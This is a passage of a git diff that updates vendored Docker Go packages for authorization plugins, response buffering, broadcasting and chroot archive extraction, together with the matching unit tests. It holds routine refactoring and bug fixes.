 	"fmt"
 	"io"
+	"mime"
 	"net/http"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/sirupsen/logrus"
 )
 
 const maxBodySize = 1048576 // 1MB
@@ -153,12 +154,17 @@ func sendBody(url string, header http.Header) bool {
 	}
 
 	// body is sent only for text or json messages
-	return header.Get("Content-Type") == "application/json"
+	contentType, _, err := mime.ParseMediaType(header.Get("Content-Type"))
+	if err != nil {
+		return false
+	}
+
+	return contentType == "application/json"
 }
 
 // headers returns flatten version of the http headers excluding authorization
 func headers(header http.Header) map[string]string {
-	v := make(map[string]string, 0)
+	v := make(map[string]string)
 	for k, values := range header {
 		// Skip authorization headers
 		if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") {
@@ -176,10 +182,7 @@ type authorizationError struct {
 	error
 }
 
-// HTTPErrorStatusCode returns the authorization error status code (forbidden)
-func (e authorizationError) HTTPErrorStatusCode() int {
-	return http.StatusForbidden
-}
+func (authorizationError) Forbidden() {}
 
 func newAuthorizationError(plugin, msg string) authorizationError {
 	return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
index a787f3cd8c..cfdb9a0039 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go
@@ -3,7 +3,7 @@
 // TODO Windows: This uses a Unix socket for testing. This might be possible
 // to port to Windows using a named pipe instead.
 
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
 	"bytes"
@@ -99,7 +99,7 @@ func TestAuthZResponsePlugin(t *testing.T) {
 
 	request := Request{
 		User:        "user",
-		RequestURI:  "someting.com/auth",
+		RequestURI:  "something.com/auth",
 		RequestBody: []byte("sample body"),
 	}
 	server.replayResponse = Response{
@@ -172,6 +172,66 @@ func TestDrainBody(t *testing.T) {
 	}
 }
 
+func TestSendBody(t *testing.T) {
+	var (
+		url       = "nothing.com"
+		testcases = []struct {
+			contentType string
+			expected    bool
+		}{
+			{
+				contentType: "application/json",
+				expected:    true,
+			},
+			{
+				contentType: "Application/json",
+				expected:    true,
+			},
+			{
+				contentType: "application/JSON",
+				expected:    true,
+			},
+			{
+				contentType: "APPLICATION/JSON",
+				expected:    true,
+			},
+			{
+				contentType: "application/json; charset=utf-8",
+				expected:    true,
+			},
+			{
+				contentType: "application/json;charset=utf-8",
+				expected:    true,
+			},
+			{
+				contentType: "application/json; charset=UTF8",
+				expected:    true,
+			},
+			{
+				contentType: "application/json;charset=UTF8",
+				expected:    true,
+			},
+			{
+				contentType: "text/html",
+				expected:    false,
+			},
+			{
+				contentType: "",
+				expected:    false,
+			},
+		}
+	)
+
+	for _, testcase := range testcases {
+		header := http.Header{}
+		header.Set("Content-Type", testcase.contentType)
+
+		if b := sendBody(url, header); b != testcase.expected {
+			t.Fatalf("Unexpected Content-Type; Expected: %t, Actual: %t", testcase.expected, b)
+		}
+	}
+}
+
 func TestResponseModifierOverride(t *testing.T) {
 	r := httptest.NewRecorder()
 	m := NewResponseModifier(r)
diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go
index 52890dd360..39c2dce856 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/middleware.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go
@@ -1,12 +1,12 @@
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
+	"context"
 	"net/http"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/plugingetter"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 // Middleware uses a list of plugins to
@@ -25,6 +25,12 @@ func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware {
 	}
 }
 
+func (m *Middleware) getAuthzPlugins() []Plugin {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	return m.plugins
+}
+
 // SetPlugins sets the plugin used for authorization
 func (m *Middleware) SetPlugins(names []string) {
 	m.mu.Lock()
@@ -32,13 +38,23 @@ func (m *Middleware) SetPlugins(names []string) {
 	m.mu.Unlock()
 }
 
+// RemovePlugin removes a single plugin from this authz middleware chain
+func (m *Middleware) RemovePlugin(name string) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	plugins := m.plugins[:0]
+	for _, authPlugin := range m.plugins {
+		if authPlugin.Name() != name {
+			plugins = append(plugins, authPlugin)
+		}
+	}
+	m.plugins = plugins
+}
+
 // WrapHandler returns a new handler function wrapping the previous one in the request chain.
 func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-
-		m.mu.Lock()
-		plugins := m.plugins
-		m.mu.Unlock()
+		plugins := m.getAuthzPlugins()
 		if len(plugins) == 0 {
 			return handler(ctx, w, r, vars)
 		}
@@ -70,6 +86,16 @@ func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.Respon
 			logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD)
 		}
 
+		// There's a chance that the authCtx.plugins was updated. One of the reasons
+		// this can happen is when an authzplugin is disabled.
+		plugins = m.getAuthzPlugins()
+		if len(plugins) == 0 {
+			logrus.Debug("There are no authz plugins in the chain")
+			return nil
+		}
+
+		authCtx.plugins = plugins
+
 		if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil {
 			logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err)
 			return err
diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go
new file mode 100644
index 0000000000..6afafe082d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go
@@ -0,0 +1,53 @@
+package authorization // import "github.com/docker/docker/pkg/authorization"
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/plugingetter"
+	"gotest.tools/assert"
+)
+
+func TestMiddleware(t *testing.T) {
+	pluginNames := []string{"testPlugin1", "testPlugin2"}
+	var pluginGetter plugingetter.PluginGetter
+	m := NewMiddleware(pluginNames, pluginGetter)
+	authPlugins := m.getAuthzPlugins()
+	assert.Equal(t, 2, len(authPlugins))
+	assert.Equal(t, pluginNames[0], authPlugins[0].Name())
+	assert.Equal(t, pluginNames[1], authPlugins[1].Name())
+}
+
+func TestNewResponseModifier(t *testing.T) {
+	recorder := httptest.NewRecorder()
+	modifier := NewResponseModifier(recorder)
+	modifier.Header().Set("H1", "V1")
+	modifier.Write([]byte("body"))
+	assert.Assert(t, !modifier.Hijacked())
+	modifier.WriteHeader(http.StatusInternalServerError)
+	assert.Assert(t, modifier.RawBody() != nil)
+
+	raw, err := modifier.RawHeaders()
+	assert.Assert(t, raw != nil)
+	assert.NilError(t, err)
+
+	headerData := strings.Split(strings.TrimSpace(string(raw)), ":")
+	assert.Equal(t, "H1", strings.TrimSpace(headerData[0]))
+	assert.Equal(t, "V1", strings.TrimSpace(headerData[1]))
+
+	modifier.Flush()
+	modifier.FlushAll()
+
+	if recorder.Header().Get("H1") != "V1" {
+		t.Fatalf("Header value must exists %s", recorder.Header().Get("H1"))
+	}
+
+}
+
+func setAuthzPlugins(m *Middleware, plugins []Plugin) {
+	m.mu.Lock()
+	m.plugins = plugins
+	m.mu.Unlock()
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go
new file mode 100644
index 0000000000..450e7fbbb7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go
@@ -0,0 +1,66 @@
+// +build !windows
+
+package authorization // import "github.com/docker/docker/pkg/authorization"
+
+import (
+	"context"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/docker/docker/pkg/plugingetter"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestMiddlewareWrapHandler(t *testing.T) {
+	server := authZPluginTestServer{t: t}
+	server.start()
+	defer server.stop()
+
+	authZPlugin := createTestPlugin(t)
+	pluginNames := []string{authZPlugin.name}
+
+	var pluginGetter plugingetter.PluginGetter
+	middleWare := NewMiddleware(pluginNames, pluginGetter)
+	handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		return nil
+	}
+
+	authList := []Plugin{authZPlugin}
+	middleWare.SetPlugins([]string{"My Test Plugin"})
+	setAuthzPlugins(middleWare, authList)
+	mdHandler := middleWare.WrapHandler(handler)
+	assert.Assert(t, mdHandler != nil)
+
+	addr := "www.example.com/auth"
+	req, _ := http.NewRequest("GET", addr, nil)
+	req.RequestURI = addr
+	req.Header.Add("header", "value")
+
+	resp := httptest.NewRecorder()
+	ctx := context.Background()
+
+	t.Run("Error Test Case :", func(t *testing.T) {
+		server.replayResponse = Response{
+			Allow: false,
+			Msg:   "Server Auth Not Allowed",
+		}
+		if err := mdHandler(ctx, resp, req, map[string]string{}); err == nil {
+			assert.Assert(t, is.ErrorContains(err, ""))
+		}
+
+	})
+
+	t.Run("Positive Test Case :", func(t *testing.T) {
+		server.replayResponse = Response{
+			Allow: true,
+			Msg:   "Server Auth Allowed",
+		}
+		if err := mdHandler(ctx, resp, req, map[string]string{}); err != nil {
+			assert.NilError(t, err)
+		}
+
+	})
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go
index 4b1c71bd4b..3316fd870c 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/plugin.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go
@@ -1,4 +1,4 @@
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
 	"sync"
@@ -48,9 +48,10 @@ func GetPluginGetter() plugingetter.PluginGetter {
 
 // authorizationPlugin is an internal adapter to docker plugin system
 type authorizationPlugin struct {
-	plugin *plugins.Client
-	name   string
-	once   sync.Once
+	initErr error
+	plugin  *plugins.Client
+	name    string
+	once    sync.Once
 }
 
 func newAuthorizationPlugin(name string) Plugin {
@@ -61,6 +62,11 @@ func (a *authorizationPlugin) Name() string {
 	return a.name
 }
 
+// Set the remote for an authz pluginv2
+func (a *authorizationPlugin) SetName(remote string) {
+	a.name = remote
+}
+
 func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) {
 	if err := a.initPlugin(); err != nil {
 		return nil, err
@@ -90,23 +96,23 @@ func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error)
 // initPlugin initializes the authorization plugin if needed
 func (a *authorizationPlugin) initPlugin() error {
 	// Lazy loading of plugins
-	var err error
 	a.once.Do(func() {
 		if a.plugin == nil {
 			var plugin plugingetter.CompatPlugin
 			var e error
 
 			if pg := GetPluginGetter(); pg != nil {
-				plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP)
+				plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.Lookup)
+				a.SetName(plugin.Name())
 			} else {
 				plugin, e = plugins.Get(a.name, AuthZApiImplements)
 			}
 			if e != nil {
-				err = e
+				a.initErr = e
 				return
 			}
 			a.plugin = plugin.Client()
 		}
 	})
-	return err
+	return a.initErr
 }
diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go
index 129bf2f417..6b674bc295 100644
--- a/vendor/github.com/docker/docker/pkg/authorization/response.go
+++ b/vendor/github.com/docker/docker/pkg/authorization/response.go
@@ -1,4 +1,4 @@
-package authorization
+package authorization // import "github.com/docker/docker/pkg/authorization"
 
 import (
 	"bufio"
@@ -8,7 +8,7 @@ import (
 	"net"
 	"net/http"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 // ResponseModifier allows authorization plugins to read and modify the content of the http.response
@@ -47,6 +47,8 @@ func NewResponseModifier(rw http.ResponseWriter) ResponseModifier {
 	return &responseModifier{rw: rw, header: make(http.Header)}
 }
 
+const maxBufferSize = 64 * 1024
+
 // responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore
 // the http request/response from docker daemon
 type responseModifier struct {
@@ -116,11 +118,13 @@ func (rm *responseModifier) OverrideHeader(b []byte) error {
 
 // Write stores the byte array inside content
 func (rm *responseModifier) Write(b []byte) (int, error) {
-
 	if rm.hijacked {
 		return rm.rw.Write(b)
 	}
 
+	if len(rm.body)+len(b) > maxBufferSize {
+		rm.Flush()
+	}
 	rm.body = append(rm.body, b...)
 	return len(b), nil
 }
@@ -192,11 +196,14 @@ func (rm *responseModifier) FlushAll() error {
 	var err error
 	if len(rm.body) > 0 {
 		// Write body
-		_, err = rm.rw.Write(rm.body)
+		var n int
+		n, err = rm.rw.Write(rm.body)
+		// TODO(@cpuguy83): there is now a relatively small buffer limit, instead of discarding our buffer here and
+		// allocating again later this should just keep using the same buffer and track the buffer position (like a bytes.Buffer with a fixed size)
+		rm.body = rm.body[n:]
 	}
 
 	// Clean previous data
-	rm.body = nil
 	rm.statusCode = 0
 	rm.header = http.Header{}
 	return err
diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
index 784d65d6fe..6bb285123f 100644
--- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
+++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go
@@ -1,4 +1,4 @@
-package broadcaster
+package broadcaster // import "github.com/docker/docker/pkg/broadcaster"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
index 9f8e72bc0f..c510584aa3 100644
--- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
+++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
@@ -1,10 +1,9 @@
-package broadcaster
+package broadcaster // import "github.com/docker/docker/pkg/broadcaster"
 
 import (
 	"bytes"
 	"errors"
 	"strings"
-
 	"testing"
 )
 
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
index a7814f5b90..47c9a2b94c 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"fmt"
@@ -11,7 +11,16 @@ import (
 	"github.com/docker/docker/pkg/idtools"
 )
 
-var chrootArchiver = &archive.Archiver{Untar: Untar}
+// NewArchiver returns a new Archiver which uses chrootarchive.Untar
+func NewArchiver(idMappings *idtools.IDMappings) *archive.Archiver {
+	if idMappings == nil {
+		idMappings = &idtools.IDMappings{}
+	}
+	return &archive.Archiver{
+		Untar:         Untar,
+		IDMappingsVar: idMappings,
+	}
+}
 
 // Untar reads a stream of bytes from `archive`, parses it as a tar archive,
 // and unpacks it into the directory at `dest`.
@@ -30,7 +39,6 @@ func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOp
 
 // Handler for teasing out the automatic decompression
 func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error {
-
 	if tarArchive == nil {
 		return fmt.Errorf("Empty archive")
 	}
@@ -41,14 +49,12 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions
 		options.ExcludePatterns = []string{}
 	}
 
-	rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
-	if err != nil {
-		return err
-	}
+	idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps)
+	rootIDs := idMappings.RootPair()
 
 	dest = filepath.Clean(dest)
 	if _, err := os.Stat(dest); os.IsNotExist(err) {
-		if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAllAndChownNew(dest, 0755, rootIDs); err != nil {
 			return err
 		}
 	}
@@ -65,33 +71,3 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions
 
 	return invokeUnpack(r, dest, options)
 }
-
-// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
-// If either Tar or Untar fails, TarUntar aborts and returns the error.
-func TarUntar(src, dst string) error {
-	return chrootArchiver.TarUntar(src, dst)
-}
-
-// CopyWithTar creates a tar archive of filesystem path `src`, and
-// unpacks it at filesystem path `dst`.
-// The archive is streamed directly with fixed buffering and no
-// intermediary disk IO.
-func CopyWithTar(src, dst string) error {
-	return chrootArchiver.CopyWithTar(src, dst)
-}
-
-// CopyFileWithTar emulates the behavior of the 'cp' command-line
-// for a single file. It copies a regular file from path `src` to
-// path `dst`, and preserves all its metadata.
-//
-// If `dst` ends with a trailing slash '/' ('\' on Windows), the final
-// destination path will be `dst/base(src)` or `dst\base(src)`
-func CopyFileWithTar(src, dst string) (err error) {
-	return chrootArchiver.CopyFileWithTar(src, dst)
-}
-
-// UntarPath is a convenience function which looks for an archive
-// at filesystem path `src`, and unpacks it at `dst`.
-func UntarPath(src, dst string) error {
-	return chrootArchiver.UntarPath(src, dst)
-}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
index d2d7e621f5..5911a36158 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"bytes"
@@ -16,20 +16,40 @@ import (
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/reexec"
 	"github.com/docker/docker/pkg/system"
+	"gotest.tools/skip"
 )
 
 func init() {
 	reexec.Init()
 }
 
+var chrootArchiver = NewArchiver(nil)
+
+func TarUntar(src, dst string) error {
+	return chrootArchiver.TarUntar(src, dst)
+}
+
+func CopyFileWithTar(src, dst string) (err error) {
+	return chrootArchiver.CopyFileWithTar(src, dst)
+}
+
+func UntarPath(src, dst string) error {
+	return chrootArchiver.UntarPath(src, dst)
+}
+
+func CopyWithTar(src, dst string) error {
+	return chrootArchiver.CopyWithTar(src, dst)
+}
+
 func TestChrootTarUntar(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntar")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil {
@@ -43,7 +63,7 @@ func TestChrootTarUntar(t *testing.T) {
 		t.Fatal(err)
 	}
 	dest := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(dest, 0700); err != nil {
+	if err := system.MkdirAll(dest, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil {
@@ -54,13 +74,14 @@ func TestChrootTarUntar(t *testing.T) {
 // gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of
 // local images)
 func TestChrootUntarWithHugeExcludesList(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil {
@@ -71,13 +92,13 @@ func TestChrootUntarWithHugeExcludesList(t *testing.T) {
 		t.Fatal(err)
 	}
 	dest := filepath.Join(tmpdir, "dest")
-	if err := system.MkdirAll(dest, 0700); err != nil {
+	if err := system.MkdirAll(dest, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	options := &archive.TarOptions{}
 	//65534 entries of 64-byte strings ~= 4MB of environment space which should overflow
 	//on most systems when passed via environment or command line arguments
-	excludes := make([]string, 65534, 65534)
+	excludes := make([]string, 65534)
 	for i := 0; i < 65534; i++ {
 		excludes[i] = strings.Repeat(string(i), 64)
 	}
@@ -152,17 +173,15 @@ func compareFiles(src string, dest string) error {
 }
 
 func TestChrootTarUntarWithSymlink(t *testing.T) {
-	// TODO Windows: Figure out why this is failing
-	if runtime.GOOS == "windows" {
-		t.Skip("Failing on Windows")
-	}
+	skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing")
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if _, err := prepareSourceDirectory(10, src, false); err != nil {
@@ -178,17 +197,15 @@ func TestChrootTarUntarWithSymlink(t *testing.T) {
 }
 
 func TestChrootCopyWithTar(t *testing.T) {
-	// TODO Windows: Figure out why this is failing
-	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
-		t.Skip("Failing on Windows and Solaris")
-	}
+	skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing")
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if _, err := prepareSourceDirectory(10, src, true); err != nil {
@@ -228,13 +245,14 @@ func TestChrootCopyWithTar(t *testing.T) {
 }
 
 func TestChrootCopyFileWithTar(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if _, err := prepareSourceDirectory(10, src, true); err != nil {
@@ -271,17 +289,15 @@ func TestChrootCopyFileWithTar(t *testing.T) {
 }
 
 func TestChrootUntarPath(t *testing.T) {
-	// TODO Windows: Figure out why this is failing
-	if runtime.GOOS == "windows" {
-		t.Skip("Failing on Windows")
-	}
+	skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing")
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if _, err := prepareSourceDirectory(10, src, false); err != nil {
@@ -336,13 +352,14 @@ func (s *slowEmptyTarReader) Read(p []byte) (int, error) {
 }
 
 func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	dest := filepath.Join(tmpdir, "dest")
-	if err := system.MkdirAll(dest, 0700); err != nil {
+	if err := system.MkdirAll(dest, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024}
@@ -352,13 +369,14 @@ func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) {
 }
 
 func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	dest := filepath.Join(tmpdir, "dest")
-	if err := system.MkdirAll(dest, 0700); err != nil {
+	if err := system.MkdirAll(dest, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024}
@@ -368,13 +386,14 @@ func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) {
 }
 
 func TestChrootApplyDotDotFile(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(tmpdir)
 	src := filepath.Join(tmpdir, "src")
-	if err := system.MkdirAll(src, 0700); err != nil {
+	if err := system.MkdirAll(src, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil {
@@ -385,7 +404,7 @@ func TestChrootApplyDotDotFile(t *testing.T) {
 		t.Fatal(err)
 	}
 	dest := filepath.Join(tmpdir, "dest")
-	if err := system.MkdirAll(dest, 0700); err != nil {
+	if err := system.MkdirAll(dest, 0700, ""); err != nil {
 		t.Fatal(err)
 	}
 	if _, err := ApplyLayer(dest, stream); err != nil {
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
index f2325abd74..5df8afd662 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"bytes"
@@ -66,10 +66,12 @@ func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.T
 	cmd.Stderr = output
 
 	if err := cmd.Start(); err != nil {
+		w.Close()
 		return fmt.Errorf("Untar error on re-exec cmd: %v", err)
 	}
 	//write the options to the pipe for the untar exec to read
 	if err := json.NewEncoder(w).Encode(options); err != nil {
+		w.Close()
 		return fmt.Errorf("Untar json encode to pipe failed: %v", err)
 	}
 	w.Close()
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
index 0a500ed5c2..f2973132a3 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
index f9d7fed633..9802fad514 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
@@ -1,14 +1,14 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"fmt"
 	"io/ioutil"
 	"os"
 	"path/filepath"
-	"syscall"
 
 	"github.com/docker/docker/pkg/mount"
 	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"golang.org/x/sys/unix"
 )
 
 // chroot on linux uses pivot_root instead of chroot
@@ -22,12 +22,17 @@ func chroot(path string) (err error) {
 	if rsystem.RunningInUserNS() {
 		return realChroot(path)
 	}
-	if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil {
+	if err := unix.Unshare(unix.CLONE_NEWNS); err != nil {
 		return fmt.Errorf("Error creating mount namespace before pivot: %v", err)
 	}
 
-	// make everything in new ns private
-	if err := mount.MakeRPrivate("/"); err != nil {
+	// Make everything in new ns slave.
+	// Don't use `private` here as this could race where the mountns gets a
+	//   reference to a mount and an unmount from the host does not propagate,
+	//   which could potentially cause transient errors for other operations,
+	//   even though this should be relatively small window here `slave` should
+	//   not cause any problems.
+	if err := mount.MakeRSlave("/"); err != nil {
 		return err
 	}
 
@@ -47,7 +52,7 @@ func chroot(path string) (err error) {
 	defer func() {
 		if mounted {
 			// make sure pivotDir is not mounted before we try to remove it
-			if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil {
